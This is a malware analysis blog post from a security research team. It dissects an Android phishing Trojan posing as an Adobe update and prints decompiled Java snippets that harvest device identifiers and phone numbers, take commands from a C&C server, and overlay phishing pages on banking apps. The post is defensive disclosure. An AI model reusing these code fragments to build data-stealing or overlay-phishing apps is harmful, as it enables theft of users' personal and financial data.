Fake Adobe Flash App Evades Most Anti Virus Detection, Manipulates Phone by Command & Control Server in Latvia

— Trustlook Research Team

Smartphones have been permeating into every corner of the world. After years of rapid growth, their popularity and usefulness reaches that of personal computers. Besides calling and texting, it is becoming more popular for people to do daily banking on their smartphone. With the computing capability, some traditional malware are shifting into the world of smartphones. They compromise the smartphone, change the phone behavior, and receive instructions from the remote attacker to steal user’s information.

One of these examples is a newly discovered malicious app named “Adobe Update”, which has the package name “droid.invisible”. It is a phishing Trojan that targets the android platform.

The sample’s MD5 is : D8616CDD54154B06A5E4D9D5B2A605E5
The package icon is::


In virustotal among 57 antivirus vendors, only 3 vendors detected them when initially submitted.


The malware conceals its own developer certificate information behind a reputable enterprise :



Yet the official com.adobe.reader app in Google Play is of this correct developer certificate:


Upon installation, this malware presents the user with a misleading setup dialog box while replacing the default SMS app:


The app displays messages to entice user to grant the device admin to maintain the persistence on the system:


The app cannot be uninstalled by the normal means:


The app communicates with a remote server and sends out critical personal information:

  • Country
  • Device model
  • IMEI
  • Network operator
  • Cell phone number
  • Malware bot ID
  • OS version
  • Device name
  • OS API level


The following code snippets demonstrate the above behaviours:


classimplements Runnable




a.a.a.a.a locala = new a.a.a.a.a();

x localx = new x();

TelephonyManager localTelephonyManager = (TelephonyManager)this.a.getSystemService(“phone”);

localx.a(“id”, localTelephonyManager.getDeviceId());

localx.a(“country”, localTelephonyManager.getNetworkCountryIso());

localx.a(“opname”, localTelephonyManager.getNetworkOperatorName());

localx.a(“osversion”, System.getProperty(“os.version”) + “(” + Build.VERSION.INCREMENTAL + “)”);

localx.a(“osapilevel”, Build.VERSION.RELEASE + “(” + Build.VERSION.SDK_INT + “)”);

localx.a(“device”, Build.DEVICE);

localx.a(“model”, Build.MODEL + ” (” + Build.PRODUCT + “)”);

localx.a(“pnumber”, localTelephonyManager.getLine1Number());

localx.a(“botid”, “777”);

locala.a(“”, localx, new b(this));


Furthermore, the malware receives command instructions from the C&C server to perform various functions:

  • loop  // wait for next command
  • sms  // send sms message
  • readsms  // retrieve sms message and send to the C&C server
  • ion // the function is not implemented, write to log file
  • ioff // same as above
  • recall // call received numbers.
  • fish // show an attacker controlled web page when a specific foreground running app is found.

The following code snippets demonstrate the malware checks for the received parameters and shows a phishing web page:

if (paramArrayOfByte[0].equals(“fish”)) // compare command name



this.b.a.startService(new Intent(this.b.a, InjectionScanner.class).putExtra(“data”, paramArrayOfByte[1]));



public class InjectionScanner extends Service


int a = 0;

String b;

public String a()


return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService(“activity”)).getRunningAppProcesses().get(0)).processName; // get foreground running process name


public void a(String paramString)


paramString = new Thread(new g(this, paramString));





public class InjectionScanner extends Service


int a = 0;

String b;

public String a()


return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService(“activity”)).getRunningAppProcesses().get(0)).processName;



public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)


this.b = paramIntent.getStringExtra(“data”);



return paramInt1;


(this.b.a().equals(localJSONObject.getJSONObject(localJSONObject.names().getString(i)).getJSONArray(“apps”).getString(j))) // compare the foreground running app name with received string


Intent localIntent = new Intent(this.b, InjectionActivity.class);


localIntent.putExtra(“injection”, localJSONObject.names().getString(i));


this.b.a = 1;



protected void onCreate(Bundle paramBundle)




paramBundle = (TelephonyManager)getSystemService(“phone”);

Intent localIntent = getIntent();

WebView localWebView = (WebView)findViewById(2131492971);


localWebView.setWebViewClient(new f(this, null));

localWebView.setWebChromeClient(new e(this, null));

localWebView.loadUrl(“” + localIntent.getStringExtra(“injection”) + “&imei=” + paramBundle.getDeviceId()); // show phishing web page



The malware displays phishing web page when a specific app is found, for example, the banking app. The fraudsters persuade gullible users to enter their financial details and harvest all the information.

The C&C server is located in Latvia:




Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s